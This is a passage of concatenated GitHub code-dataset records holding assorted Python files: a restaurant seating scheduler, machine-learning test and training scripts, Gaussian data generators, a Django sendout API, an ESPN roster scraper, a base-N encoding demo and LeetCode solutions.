self.assign_customer_table(\n customer_id,\n t_id\n )\n self.tables[t_type][t_id] -=1\n m_choice = pref['meal_choice']\n self.waiting_list[m_choice].discard(customer_id)\n del self.waiting_list['customers'][customer_id]\n assigned = True\n break\n\n if not assigned:\n unassigned.append(customer_id)\n except Exception as e:\n self.log.exception(f\"{self} exiting\")\n self.log.warning(f\"{self} exiting\")","repo_name":"codemation/restaurant","sub_path":"restaurant/apps/restaurant/hostess.py","file_name":"hostess.py","file_ext":"py","file_size_in_byte":13046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"5392688924","text":"from ClassificationTreeTester import ClassTree\n\nfrom automation import Tester\nimport numpy as np\n\nnn_vars_to_test = [1, 2, 4, 8, 16, 32, 64, 128, 256, 512, 1024, 2048]\nks_to_test = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\nlambda_to_test = np.power(10.,range(-30,30))\nlambda_to_test = [float(x) for x in lambda_to_test]\nclassTree_to_test = [\"gini\", \"entropy\", \"log_loss\"]\nbaseline_to_test = ['micro', 'macro', 'weighted', 'samples']\n\nall_vars_to_test1 = [nn_vars_to_test, ks_to_test, baseline_to_test]\nall_vars_to_test2 = [lambda_to_test, classTree_to_test, baseline_to_test]\n\npath_to_data = \"/Users/lucasvilsen/Desktop/DTU/MachineLearning&DataMining/Project2/StandardizedDataFrameWithNansFilled.csv\"\ntester = Tester(\"StatusClassification\", path_to_data, function_to_test = ClassTree, final_test = False, \n k = 10, 
cross_validation_level = 1, vars_to_test=classTree_to_test)\nprint(tester.results)","repo_name":"Apros7/DTU_MachineLearning","sub_path":"Project2/class_tree_test.py","file_name":"class_tree_test.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6777503611","text":"from typing import List, Union\n\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\nclass LatentGaussianMixture:\n k: int\n mu: List[list]\n cov: List[list]\n pi: List[float] # mixing proportion\n d_z: int\n d_x: int\n M: list\n B: list\n\n def __init__(self, k: int, d_z: int, d_x: int, pi: List[float],\n mu: List[list], cov: List[list],\n M: Union[list, np.ndarray],\n B: Union[list, np.ndarray],\n cov_0: Union[list, np.ndarray]):\n self.k = k\n self.d_z = d_z\n self.d_x = d_x\n self.mu = mu\n self.cov = cov\n self.pi = pi\n self.M = M\n self.B = B\n self.cov_0 = cov_0\n\n def sample(self, n: int, batch_size: int = None):\n if batch_size is None or n < batch_size:\n batch_size = n\n\n p_bar = tqdm(total=n, unit=\"data points\",\n desc=\"Generating data points from Latent Gaussian Mixture\")\n total_ = 0\n while total_ < n:\n z = np.random.randn(batch_size, self.k, self.d_z)\n z = np.einsum('nmj,mjd->nmd', z, np.asarray(self.cov)) + np.asarray(self.mu)\n pi = np.random.multinomial(1, self.pi, size=batch_size)\n z = np.sum(pi[:, :, np.newaxis] * z, axis=1)\n mu_0 = np.matmul(z, self.M) + self.B\n\n x = np.random.randn(batch_size, self.d_x)\n x = np.einsum('nj,ji->ni', x, self.cov_0) + mu_0\n\n yield x, z\n total_ += batch_size\n p_bar.update(batch_size)\n\n @property\n def k(self):\n return self.__k\n\n @k.setter\n def k(self, val):\n assert val > 1\n self.__k = val\n\n @property\n def pi(self):\n return self.__pi\n\n @pi.setter\n def pi(self, val):\n assert len(val) == self.k and np.sum(val) == 1.0\n self.__pi = val\n\n @property\n def d_z(self):\n return self.__d_z\n\n @d_z.setter\n def d_z(self, val):\n assert 1 < val < 4\n self.__d_z = val\n\n @property\n def d_x(self):\n return self.__d_x\n\n @d_x.setter\n def d_x(self, val):\n assert val > 2\n self.__d_x = val\n\n @property\n def mu(self):\n return self.__mu\n\n @mu.setter\n def mu(self, val):\n assert len(val) == self.k\n assert (all(len(com) == self.__d_z for com in val))\n self.__mu = val\n\n @property\n def cov(self):\n return self.__cov\n\n @cov.setter\n def cov(self, val):\n assert len(val) == self.k\n assert (all(len(com) == self.__d_z for com in val))\n self.__cov = val\n\n @property\n def M(self):\n return self.__M\n\n @M.setter\n def M(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (self.d_z, self.d_x)\n self.__M = val\n\n @property\n def B(self):\n return self.__B\n\n @B.setter\n def B(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (1, self.d_x)\n self.__B = val\n\n @property\n def cov_0(self):\n return self.__cov_0\n\n @cov_0.setter\n def cov_0(self, val):\n if isinstance(val, list):\n val = np.asarray(val)\n assert val.shape == (self.d_x, self.d_x)\n self.__cov_0 = torch.from_numpy(val).type(torch.float32)\n\n\nclass LatentLinearGaussian:\n \"\"\"\n Samples\n z ~ Normal(mean_z, cov_z)\n x ~ Normal(M.z + b, 1)\n where\n M = T(sigma, rho) . R_x(phi) . 
R_y(theta)\n with R_y, R_x rotations and T the shear mapping\n T = 1 sigma rho\n 0 1 0\n 0 0 1\n 1+sigma*rho 0 sigma\n 0 1 0\n rho 0 1\n \"\"\"\n def __init__(self, theta: int, phi: int, sigma: int, rho: int,\n mean_z: list, std_dev_z: list, std_dev_x: int = 0.1,\n use_random_lin_map: bool = False, use_hidden_variable_model: bool = True,\n data_dim: int = 6):\n \"\"\"\n\n mean_z, std_dev_z: gaussian distr. param in latent space\n std_dev_x: gaussian distr. param in data space. Here mean_x is set to zero\n\n (*) If use_hidden_variable_model is TRUE and use_random_lin_map is FALSE\n then M = T(sigma, rho) . R_x(phi) . R_y(theta) is used, where:\n theta: rotation about 'y' axis\n phi: rotation about 'x' axis\n sigma: parameter for shear mapping 1\n rho: parameter for shear mapping 2\n \"\"\"\n if use_hidden_variable_model:\n # (1) linear map to data space:\n if use_random_lin_map:\n latent_dim = len(mean_z)\n self.lin_map = np.random.randn(data_dim, latent_dim)\n else:\n latent_dim, data_dim = 3, 6\n if len(mean_z) != latent_dim or len(std_dev_z) != latent_dim:\n raise ValueError('If use_random_lin_map is False, the latent dim is fixed to 3 '\n '(i.e. len(mean_z), len(std_dev_z) should equal 3)')\n cos_phi = np.cos(phi)\n cos_theta = np.cos(theta)\n sin_phi = np.sin(phi)\n sin_theta = np.sin(theta)\n r_x = np.array([[1., 0., 0.],\n [0., cos_phi, -sin_phi],\n [0., sin_phi, cos_phi]])\n r_y = np.array([[cos_theta, 0., sin_theta],\n [0., 1., 0.],\n [-sin_theta, 0., cos_theta]])\n t =np.array([[1., sigma, rho],\n [0., 1., 0.],\n [0., 0., 1.],\n [1. + sigma*rho, 0., sigma],\n [0., 1., 0.],\n [rho, 0., 1.]])\n self.lin_map = np.matmul(t, np.matmul(r_x, r_y)) # [6, 3]\n\n # (2) Gaussian parameters for latent distribution\n self.mean_z = np.array(mean_z)[np.newaxis, :]\n self.std_dev_z = np.array(std_dev_z)[np.newaxis, :]\n\n # (3) Gaussian parameters for data distribution\n self.mean_x = np.zeros((data_dim,))[np.newaxis, :]\n self.std_dev_x = std_dev_x * np.ones((data_dim,))[np.newaxis, :]\n\n # (4) compute covariance matrix of marginal (Gaussian) density\n cov_z = np.zeros((latent_dim, latent_dim))\n np.fill_diagonal(cov_z, self.std_dev_z[0] * self.std_dev_z[0])\n self.data_cov_matrix = (std_dev_x * std_dev_x) * np.eye(data_dim) + \\\n np.matmul(self.lin_map, np.matmul(cov_z, self.lin_map.T))\n else:\n latent_dim = None\n self.lin_map = np.random.randn(data_dim, data_dim)\n self.data_cov_matrix = np.matmul(self.lin_map, self.lin_map.T)\n\n self.latent_dim = latent_dim\n self.data_dim = data_dim\n self.use_hidden_variable_model = use_hidden_variable_model\n\n def sample(self, n: int, batch_size: int = None):\n if batch_size is None or n < batch_size:\n batch_size = n\n p_bar = tqdm(total=n, unit=\"data points\",\n desc=\"Generating data points from Linear Gaussian Model\")\n total_ = 0\n while total_ < n:\n if self.use_hidden_variable_model:\n # sample latent variable\n z = np.random.randn(batch_size, self.latent_dim)\n z = self.mean_z + z * self.std_dev_z\n # sample data\n x = np.random.randn(batch_size, self.data_dim)\n x = np.matmul(z, self.lin_map.T) + self.mean_x + x * self.std_dev_x\n else:\n x = np.random.randn(batch_size, self.data_dim)\n x = np.matmul(x, self.lin_map.T)\n z = np.zeros((batch_size,2))\n yield x, z\n total_ += batch_size\n 
p_bar.update(batch_size)\n\n\n","repo_name":"lukasalexanderconrads/diffusion","sub_path":"src/diffusion/models/data_models.py","file_name":"data_models.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10182201645","text":"from __future__ import unicode_literals\n\nimport base64\nimport hashlib\n\nfrom django.db import transaction\nfrom django.http.response import JsonResponse\nfrom django.utils import timezone\nfrom oidc_provider.models import Client\nfrom werkzeug.exceptions import MethodNotAllowed, PreconditionFailed, Forbidden, NotImplemented\n\nfrom associated.models import SimpleClientCommunicationRequest, AssociatedService\nfrom library.log import rbe_logger\n\n\"\"\"\n The general API for all associated services.\n The goal is that an associated service can send messages to users on a specific aggregation level.\n\n For example it can be send to all users with a specific country, with a distance to a specific location,\n or with a skill.\n\n The email comes from the RBE network and informs why the email is send and also generates an unsubscribe\n from this client link.\n\"\"\"\n\n\n@transaction.atomic\ndef simple_sendout(request):\n \"\"\" Makes a general sendout to every user on the network\n @required - client_id\n @message_text - the text that the people should receive \"\"\"\n\n if request.method == 'POST':\n\n client_id = request.POST.get('client_id')\n\n try:\n client = Client.objects.get(client_id=client_id)\n except Client.DoesNotExist:\n rbe_logger.info(\n \"Someone called the API for language_sendout with a not known client_id={}\".format(client_id))\n return JsonResponse({'error': 'client_id not known'}, status=PreconditionFailed.code)\n\n message_text = request.POST.get('message_text')\n\n if not message_text or not (isinstance(message_text, str) or isinstance(message_text, unicode)):\n rbe_logger.info(\n \"Someone called the API for language_sendout with a not known client_id={}\".format(client_id))\n return JsonResponse({'error': 'message_text not valid'}, status=PreconditionFailed.code)\n\n if len(message_text) < 50:\n return JsonResponse({'error': 'message_text to short'}, status=PreconditionFailed.code)\n\n check_sum = request.POST.get('check_sum')\n\n if not check_sum:\n return JsonResponse({'error': 'check_sum not given'}, status=PreconditionFailed.code)\n\n # To verify that the client is really the one we check the message hash with salting by secret key\n dk = hashlib.pbkdf2_hmac('sha256', message_text, client.client_secret, 100000)\n check_sum_verification = base64.b64encode(dk).decode() # py3k-mode\n\n if check_sum != check_sum_verification:\n rbe_logger.error(\"Checksum for request failed client_id={}\".format(client.client_id))\n return JsonResponse({'error': 'check_sum not valid'}, status=Forbidden.code)\n\n # If all of those checks are passed we can actually check logical if the client is allowed to make\n # the request - we allow simplified one request every month for a given language\n\n # Lets check if there was a sendout on this language code\n\n try:\n assoc_net = AssociatedService.objects.get(client=client, enabled=True)\n except AssociatedService.DoesNotExist:\n rbe_logger.error(\n \"Client requested sendout but assoc service not existing client_id={}\".format(client.client_id))\n return JsonResponse({'error': 'Server has encountered internal precondition problems. 
'\n 'Please contact the team that gave you the access to this service.'},\n status=NotImplemented.code)\n\n minimal_sendout_date = timezone.datetime.now() - timezone.timedelta(days=assoc_net.sendout_day_period)\n\n # Check if there is something newer than the n-days silence period or a still pending request\n scc_qs_time = SimpleClientCommunicationRequest.objects.filter(client=client, pending=False, created__gte=minimal_sendout_date)\n scc_qs_pend = SimpleClientCommunicationRequest.objects.filter(client=client, pending=True)\n\n if scc_qs_pend.exists():\n # We cannot allow the client to send something again as there is still a job pending\n sccr = scc_qs_pend.first()\n return JsonResponse({\n 'error': 'pending_job',\n 'job_id': sccr.id,\n 'job_created': sccr.created.isoformat()\n }, status=409)\n elif scc_qs_time.exists():\n # We cannot allow the client to send something again as they need to wait more time\n sccr = scc_qs_time.first()\n time_to_send_again = timezone.timedelta(days=assoc_net.sendout_day_period) - (timezone.now() - sccr.created)\n return JsonResponse({\n 'error': 'timeout_period',\n 'job_timeout': time_to_send_again.seconds\n }, status=409)\n pass\n else:\n # Create a job as the information send out needs to be quickly checked\n # Send a test email to the admin and present how the email would look like\n sccr = SimpleClientCommunicationRequest(client=client, message_text=message_text)\n sccr.save()\n\n return JsonResponse({\n 'success': True,\n 'job_id': sccr.id,\n 'job_created': sccr.created.isoformat(),\n 'job_description': 'The message was accepted and wil be checked. Once released it will be send to the desired group of users'\n }, status=202)\n\n else:\n return JsonResponse({'success': False}, status=MethodNotAllowed.code)\n","repo_name":"sheepsy90/django-rbe","sub_path":"associated/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5565,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"12132556365","text":"# 140. 
Word Break II\n# https://leetcode.com/problems/word-break-ii\nimport unittest\n\n\nclass Solution:\n    def __init__(self):\n        self.memo = {}\n\n    def _word_break_helper(self, s, word_dic, start):\n        if start in self.memo:\n            return self.memo[start]\n        res = []\n        if start == len(s):\n            res.append('')\n        for end in range(start + 1, len(s) + 1):\n            sub_str = s[start:end]\n            if sub_str in word_dic:\n                sub_rest = self._word_break_helper(s, word_dic, end)\n                for sub in sub_rest:\n                    sub = sub_str + (' ' if sub != '' else '') + sub\n                    res.append(sub)\n        self.memo[start] = res\n        return res\n\n    def wordBreak(self, s, wordDict):\n        '''\n        :type s: str\n        :type wordDict: List[str]\n        :rtype: List[str]\n        '''\n        if not s:\n            return []\n        self.memo = {}\n        result = self._word_break_helper(s, set(wordDict), 0)\n        return result\n\n\nclass TestWordBreak(unittest.TestCase):\n    def test(self):\n        sol = Solution()\n        self.assertEqual(\n            sol.wordBreak('catsanddog', ['cat', 'cats', 'and', 'sand', 'dog']),\n            [\n                'cat sand dog',\n                'cats and dog'\n            ]\n        )\n        self.assertEqual(\n            sol.wordBreak('pineapplepenapple', ['apple', 'pen', 'applepen', 'pine', 'pineapple']),\n            [\n                'pine apple pen apple',\n                'pine applepen apple',\n                'pineapple pen apple',\n            ]\n        )\n        self.assertEqual(\n            sol.wordBreak('catsandog', ['cats', 'dog', 'sand', 'and', 'cat']),\n            []\n        )\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"smartdolphin/python-algorithm","sub_path":"problems/word_break_ii.py","file_name":"word_break_ii.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"4109389454","text":"\"\"\"\nTrain model with argument setting\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nfrom torchvision.utils import make_grid\nfrom torch.autograd import Variable\nfrom torch.optim.lr_scheduler import MultiStepLR\nfrom torch.utils.data import DataLoader\nimport torch.nn.functional as F\n\nfrom datetime import datetime\nfrom math import ceil\nimport os\nimport os.path as osp\nimport pickle\nimport numpy as np\nimport cv2\nimport lmdb\nimport torch\nimport random\nimport copy\nimport utils\nfrom model import STSR, RefineLayer\n\n# Superslomo module\nimport IT_arch.superslomo as superslomo\n\n# Dataset & loss & optimizer\nfrom dataset import vimeo90k\nfrom radam import RAdam\n\n# Extra module\nfrom tqdm import tqdm\nimport argparse\n\n\n##############################\n#      Constant Setting      #\n##############################\nparser = argparse.ArgumentParser()\n\n## Hyper-parameter\nparser.add_argument(\"--gpu_id\", type=str, default='0')\nparser.add_argument(\"--batch_size\", type=int, default=12)\nparser.add_argument(\"--epochs\", type=int, default=50)\nparser.add_argument(\"--dataset\", type=str, default='vimeo90k')\nparser.add_argument(\"--data_root\", type=str, default='/data')\nparser.add_argument(\"--lr\", type=float, default=1e-5)\nparser.add_argument(\"--merge_lr\", type=float, default=1e-4)\n\n## Model related settings\nparser.add_argument(\"--sr_type\", type=str, choices=['ESPCN', 'SAN'])\nparser.add_argument(\"--it_type\", type=str, choices=['SSM', 'DAIN'])\nparser.add_argument(\"--merge_in\", type=int)\nparser.add_argument(\"--merge_out\", type=int)\nparser.add_argument(\"--two_mask\", action=\"store_true\")\nparser.add_argument(\"--refine_type\", type=str, default='resblock')\nparser.add_argument(\"--refine_in\", type=int, default=3)\nparser.add_argument(\"--input_R\", type=str, 
choices=['ST', 'TS', 'Both', 'Half', 'IFISTITS', '3timestamp'], default='Both')\nparser.add_argument(\"--stsr_weight\", type=str)\n\n## Training strategy\nparser.add_argument(\"--train_MsMt\", action='store_true')\nparser.add_argument(\"--train_F\", action='store_true')\nparser.add_argument(\"--train_R\", action='store_true')\nparser.add_argument(\"--detach\", action='store_true')\nparser.add_argument(\"--seed\", type=int, default=0)\n\n## Other option\nparser.add_argument(\"--save_dir\", type=str, default='./results/')\n\nargs = parser.parse_args()\nprint(args)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nsave_dir = os.path.join(args.save_dir)\nos.makedirs(save_dir, exist_ok=True)\nSPATIAL_SIZE = (64, 112)\nnn_down = nn.Upsample(scale_factor=0.5, mode='bicubic').to(device)\n\n\n## randomness\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\ndef main():\n # Load dataset & dataloader\n if args.dataset == 'vimeo90k':\n train_dataset = vimeo90k.Vimeo90kDataset(args.data_root, SPATIAL_SIZE, train=True)\n val_dataset = vimeo90k.Vimeo90kDataset(args.data_root, (64, 112), train=False)\n else:\n raise NotImplementedError('Not support other dataset now')\n\n train_loader = DataLoader(dataset=train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=8, pin_memory=True, drop_last=True)\n val_loader = DataLoader(dataset=val_dataset, batch_size=24, shuffle=False, num_workers=8, pin_memory=True)\n \n # Load SR/interp model\n stsr = STSR(\n args.sr_type, None,\n args.it_type, None,\n args.merge_in, args.merge_out, None, args.two_mask,\n args.refine_type, args.refine_in, None, args.input_R,\n args.train_MsMt, args.train_F, args.train_R, args.detach\n )\n\n cri = nn.L1Loss().to(device)\n\n # set and load optimizer\n optimizer = stsr.get_optimizer(\n args.lr, args.merge_lr, args.train_MsMt, args.train_F, args.train_R\n )\n\n # Dataparallel and to device\n stsr = nn.DataParallel(stsr).to(device)\n \n _ = val_loop(stsr, val_loader, val_dataset, args.start_epoch)\n best_PSNR = 0\n for epoch in tqdm(range(args.start_epoch, args.epochs), desc='[EPOCH]'):\n record_TOTAL = []\n record_MERGE = []\n record_RESIDUAL = []\n record_SR = []\n record_IT = []\n record_SR_IT = []\n record_IT_SR = []\n record_WARP = []\n\n stsr.train()\n for _, train_data in enumerate(tqdm(train_loader, desc='[TRAIN]')):\n HR = train_data['HR'].to(device)\n LR = torch.stack([nn_down(HR[:, 0]), nn_down(HR[:, 1]), nn_down(HR[:, 2])], dim=1)\n LR = LR.clamp(0, 1).detach()\n GT = HR[:, 1]\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(LR[:, 0], LR[:, 2])\n\n # calculate and record loss\n loss_total = 0\n if args.train_MsMt:\n loss_it = cri(I_L_2, LR[:, 1])\n loss_sr = 0.5*cri(I_H_1, HR[:, 0]) + 0.5*cri(I_H_3, HR[:, 2])\n loss_it_sr = cri(I_TS_2, HR[:, 1])\n loss_sr_it = cri(I_ST_2, HR[:, 1])\n loss_total += loss_it + loss_sr + loss_it_sr + loss_sr_it\n record_IT.append(loss_it.item())\n record_SR.append(loss_sr.item())\n record_SR_IT.append(loss_sr_it.item())\n record_IT_SR.append(loss_it_sr.item())\n\n if args.train_F:\n loss_merge = cri(I_F_2, GT)\n loss_total += loss_merge\n record_MERGE.append(loss_merge.item())\n\n if args.train_R:\n loss_residual = cri(I_R_2, GT)\n loss_total += loss_residual\n record_RESIDUAL.append(loss_residual.item())\n\n record_TOTAL.append(loss_total.item())\n\n optimizer.zero_grad()\n loss_total.backward()\n optimizer.step()\n\n loss_log = {\n 
'Total Loss': np.mean(record_TOTAL)\n }\n\n if args.train_MsMt:\n loss_log['IT Loss'] = np.mean(record_IT)\n loss_log['SR Loss'] = np.mean(record_SR)\n loss_log['SR_IT Loss'] = np.mean(record_SR_IT)\n loss_log['IT_SR Loss'] = np.mean(record_IT_SR)\n \n if args.train_F:\n loss_log['MERGE Loss'] = np.mean(record_MERGE)\n\n if args.train_R:\n loss_log['Residual Loss'] = np.mean(record_RESIDUAL)\n\n if args.train_warp:\n loss_log['Warp Loss'] = np.mean(record_WARP)\n print(loss_log)\n\n ### validation\n avg_PSNR = val_loop(stsr, val_loader, val_dataset, epoch+1)\n utils.save_model(stsr, 'STSR', 'current', save_dir)\n if avg_PSNR > best_PSNR:\n best_PSNR = avg_PSNR\n utils.save_model(stsr, 'STSR', 'best', save_dir)\n\n if (epoch+1) % 5 == 0:\n utils.save_model(stsr, 'STSR', epoch+1, save_dir)\n torch.save(optimizer.state_dict(), os.path.join(save_dir, 'optimizer.pth'))\n\n\ndef val_loop(stsr, val_loader, val_dataset, epoch):\n ### validation\n avg_PSNR_TS = 0\n avg_PSNR_ST = 0\n avg_PSNR_MERGE = 0\n avg_PSNR_RESIDUAL = 0\n avg_PSNR_HR = 0\n avg_PSNR_LR = 0\n\n stsr.eval()\n\n\n with torch.no_grad():\n for vid, val_data in enumerate(tqdm(val_loader)):\n \"\"\"\n TEST CODE\n \"\"\"\n if args.train_MsMt:\n HR = val_data['HR'].to(device)\n LR = torch.stack([nn_down(HR[:, 0]), nn_down(HR[:, 1]), nn_down(HR[:, 2])], dim=1)\n LR = LR.clamp(0, 1).detach()\n GT = HR[:, 1]\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(LR[:, 0], LR[:, 2])\n else:\n ST = val_data['ST'].to(device)\n TS = val_data['TS'].to(device)\n GT = val_data['GT'].to(device)\n I_L_2, I_H_1, I_H_3, I_TS_2, I_ST_2, I_F_2, mask_1, mask_2, I_R_basic, I_R_2 = stsr(ST, TS)\n\n B, C, H, W = GT.size()\n \n\n for b_id in range(B):\n avg_PSNR_MERGE += utils.cal_psnr(I_R_basic[b_id], GT[b_id]).item()\n avg_PSNR_RESIDUAL += utils.cal_psnr(I_R_2[b_id], GT[b_id]).item()\n avg_PSNR_TS += utils.cal_psnr(I_TS_2[b_id], GT[b_id]).item()\n avg_PSNR_ST += utils.cal_psnr(I_ST_2[b_id], GT[b_id]).item()\n if args.train_MsMt:\n avg_PSNR_HR += utils.cal_psnr(I_H_1[b_id], HR[b_id, 0]).item()+utils.cal_psnr(I_H_3[b_id], HR[b_id, 2]).item()\n avg_PSNR_LR += utils.cal_psnr(I_L_2[b_id], LR[b_id, 1]).item()\n\n\n log = {\n 'PSNR_TS': avg_PSNR_TS/len(val_dataset),\n 'PSNR_ST': avg_PSNR_ST/len(val_dataset),\n 'PSNR_MERGE': avg_PSNR_MERGE/len(val_dataset),\n 'PSNR_RESIDUAL': avg_PSNR_RESIDUAL/len(val_dataset)\n }\n if args.train_MsMt:\n log['PSNR_HR'] = avg_PSNR_HR/len(val_dataset)/2.\n log['PSNR_LR'] = avg_PSNR_LR/len(val_dataset)\n print(log)\n \n return avg_PSNR_RESIDUAL/len(val_dataset)\n\n\n\nif __name__ == '__main__':\n main()","repo_name":"TMYuan/Dual-Stream-Fusion-Network","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8996,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33642105900","text":"\n# YOUR CODE HERE\n#raise NotImplementedError()\nimport requests\nimport re\nfrom requests.exceptions import HTTPError\nfrom bs4 import BeautifulSoup\n\ndef get_team_url(team_id, team_name):\n url = \"https://www.espn.com/college-football/team/roster/_/id/\" + str(team_id) + \"/\"\n real_team_name = team_name.split( )\n #print(real_team_name)\n i = 1\n while (len(real_team_name) > i): \n url = url + real_team_name[i-1].lower()+\"-\"\n i = i + 1\n else: \n url = url + real_team_name[i-1].lower()\n return url\n\ndef extract_team_roster(team_id, team_name):\n \"\"\"\n Extract the team roster for a NCAA college football team\n \n Args:\n 
team_id: the id of a NACC football team assigned by ESPN\n team_name: the name of the football team\n \n Returns:\n a list of dict representing the roster of the entire team.\n \"\"\"\n #team_id = 150\n #team_name = \"Duke Blue Devils\"\n roster = []\n def mysplit(s, ex):\n head = s.rstrip(ex)\n tail = s[len(head):]\n return head, tail\n \n def is_player_row(tag):\n if tag.name == 'tr' and tag.has_attr('data-idx'):\n return True\n return False\n \n #Computing Team URL\n url = get_team_url(team_id, team_name)\n\n #Create a BeautifulSoup Object\n response = requests.get(url)\n html = response.content\n soup = BeautifulSoup(html, 'html.parser')\n \n #Finding Team Name\n team_tag = soup.find('h1', string=re.compile(' Roster$'))\n \n #Searching For Team Group\n groups = soup.find_all(class_=\"Table__Title\", string=[\"Offense\", \"Defense\", \"Special Teams\"])\n #print(len(groups), \"groups\")\n #for g in groups:\n #print(g)\n \n #Finding the Column Names\n col_names = []\n for g in groups:\n t = g.find_next(\"table\")\n for c in t.thead.tr.children:\n col_names.append(c.text)\n \n #Find the Attributes of a Player\n players = []\n id_list = []\n for x in groups :\n table = x.find_next(\"table\")\n for c in table.tbody.find_all(is_player_row):\n tds = c.find_all('td')\n cols = []\n for td in tds:\n cols.append(td.get_text())\n players.append(cols)\n for aPlayer in players :\n player = {}\n name = mysplit(aPlayer[1], '0123456789')\n player[\"player_name\"] = name[0]\n \n player_url_name = name[0].split()\n #print(player_url_name)\n totalURL = \"\"\n i = 1\n for x in player_url_name :\n #print(x)\n if i != len(player_url_name) :\n if x.find(\".\") :\n x = x.replace('.', '') \n if x.find('\\'') :\n #print(x)\n x = x.replace('\\'', '') \n if x.find(',') :\n x = x.replace(',', '')\n #print(x)\n totalURL = totalURL + x.lower() + \"-\"\n else :\n if x.find(\".\") :\n x = x.replace('.', '')\n if x.find('\\'') :\n #print(x)\n x = x.replace('\\'', '') \n if x.find(',') :\n x = x.replace(',', '')\n if x != '' :\n #print(x)\n totalURL = totalURL + x.lower()\n i = i + 1\n totalURL = '/' + totalURL\n #print(totalURL)\n #print(soup.find('a', href=re.compile(totalURL))['href'])\n id = soup.find('a', href=re.compile(totalURL))['href']\n id = re.sub('http://www.espn.com/college-football/player/_/id/', '', id)\n id = re.sub(totalURL, '', id)\n if id_list.count(id) == 0: \n id_list.append(id)\n player[\"player_id\"] = id\n if name[1] == '' :\n player[\"player_no\"] = \"NA\"\n else :\n player[\"player_no\"] = name[1]\n player[\"POS\"] = aPlayer[2]\n player[\"HT\"] = aPlayer[3]\n player[\"WT\"] = aPlayer[4]\n player[\"Class\"] = aPlayer[5]\n player[\"Birthplace\"] = aPlayer[6]\n #print(player)\n roster.append(player)\n \n # YOUR CODE HERE\n #raise NotImplementedError()\n return roster\n","repo_name":"joshlin5/cpsc6300ps3backup","sub_path":"ps01/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21705413729","text":"#!/usr/bin/env python3\n# utf-8\n\n'''\ndemo for the following base-N functions:\n base58\n base64\n base85\n'''\n\nimport sys\nimport base64\nfrom random import randint\nimport numpy as np\n\ntry:\n import base58\nexcept ImportError:\n print('cannot import module: base58')\n sys.exit(1)\n\ndef int_to_bytes(x: int) -> bytes:\n ''' int to bytes '''\n return x.to_bytes((x.bit_length() + 7) // 8, 'big')\n\ndef int_from_bytes(xbytes: bytes) -> int:\n ''' int from bytes '''\n 
r = int.from_bytes(xbytes, byteorder='big')\n return r\n\ndef fill_bytearray(size: int = 24) -> bytes:\n ''' fill byte array '''\n return np.random.bytes(size)\n\n\ndef test(v: bytes):\n ''' test '''\n\n def show(m, n):\n ''' show '''\n print(f'{m:<14s}: {n}')\n\n #hx = binascii.hexlify(v) # bytes: b'([0-9a-f][0-9a-f])+'\n #show('input', hx)\n hxx = v.hex() # str: ([0-9a-f][0-9a-f])+\n show('input hex', hxx)\n #b16 = base64.b16encode(v) # bytes: b'([0-9A-F][0-9A-F])+'\n #show('b16encode', b16)\n print('-' * 60)\n\n r0 = base64.standard_b64encode(v)\n r1 = base64.b64encode(v)\n r2 = base64.urlsafe_b64encode(v)\n\n if r0 != r1:\n show('std base64', r0)\n show('base64', r1)\n\n if r1 != r2:\n show('urlsafe base64', r2)\n\n print('-' * 60)\n r = base64.a85encode(v)\n show('base85a', r)\n r = base64.b85encode(v)\n show('base85b', r)\n\n print('-' * 60)\n r = base58.b58encode(v)\n show('base58', r)\n\n\ndef main(argv):\n ''' main '''\n if argv == []:\n for _ in range(1):\n x = fill_bytearray(randint(10, 40))\n argv.append(x)\n\n for e in argv:\n try:\n if isinstance(e, str):\n v = e.encode('utf-8')\n elif isinstance(e, int):\n v = int_to_bytes(e)\n elif isinstance(e, bytes):\n v = e\n else:\n v = bytes(e)\n\n test(v)\n print()\n except ValueError:\n print(f'invalid input: {e}')\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"ericosur/ericosur-snippet","sub_path":"python3/b6485.py","file_name":"b6485.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34138397363","text":"#\n# @lc app=leetcode id=83 lang=python3\n#\n# [83] Remove Duplicates from Sorted List\n#\n# https://leetcode.com/problems/remove-duplicates-from-sorted-list/description/\n#\n# algorithms\n# Easy (42.71%)\n# Total Accepted: 336.7K\n# Total Submissions: 786.7K\n# Testcase Example: '[1,1,2]'\n#\n# Given a sorted linked list, delete all duplicates such that each element\n# appear only once.\n# \n# Example 1:\n# \n# \n# Input: 1->1->2\n# Output: 1->2\n# \n# \n# Example 2:\n# \n# \n# Input: 